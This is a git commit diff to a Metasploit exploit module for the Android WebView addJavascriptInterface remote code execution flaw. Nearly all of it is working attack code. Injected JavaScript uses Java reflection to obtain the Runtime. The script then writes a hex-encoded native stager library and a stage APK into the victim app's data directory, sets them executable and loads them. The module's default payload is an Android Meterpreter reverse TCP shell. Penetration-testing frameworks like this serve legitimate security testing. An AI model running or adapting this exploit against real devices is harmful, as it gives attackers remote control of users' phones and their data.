native jni stager

bug/bundler_fix
Tim 2014-02-25 00:13:18 +00:00 committed by Joe Vennix
parent 4f31eba7f4
commit c76924e946
1 changed files with 24 additions and 10 deletions

View File

@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
], ],
'Platform' => 'linux', 'Platform' => 'android',
'Arch' => ARCH_ARMLE, 'Arch' => ARCH_DALVIK,
'DefaultOptions' => { 'PrependFork' => true }, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', },
'Targets' => [ [ 'Automatic', {} ] ], 'Targets' => [ [ 'Automatic', {} ] ],
'DisclosureDate' => 'Dec 21 2012', 'DisclosureDate' => 'Dec 21 2012',
'DefaultTarget' => 0, 'DefaultTarget' => 0,
@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
send_response_html(cli, html) send_response_html(cli, html)
end end
def dalvikstager()
localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so')
data = File.read(localfile, {:mode => 'rb'})
data
end
def js def js
%Q| %Q|
function exec(obj) { function exec(obj) {
@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote
// get the runtime so we can exec // get the runtime so we can exec
var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; var runtime = m.invoke(null, null);
var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}";
var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}";
// get the process name, which will give us our data path // get the process name, which will give us our data path
var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
var ch, path = '/data/data/'; var ch, path = '/data/data/';
while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
path += '/#{Rex::Text.rand_text_alpha(8)}'; var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';
var stagePath = path + '/stage.apk';
// build the binary, chmod it, and execute it // build the library and chmod it
m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor();
m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); runtime.exec(['chmod', '700', libraryPath]).waitFor();
m.invoke(null, null).exec([path]);
// build the stage, chmod it, and load it
runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor();
runtime.exec(['chmod', '700', stagePath]).waitFor();
runtime.load(libraryPath);
return true; return true;
} }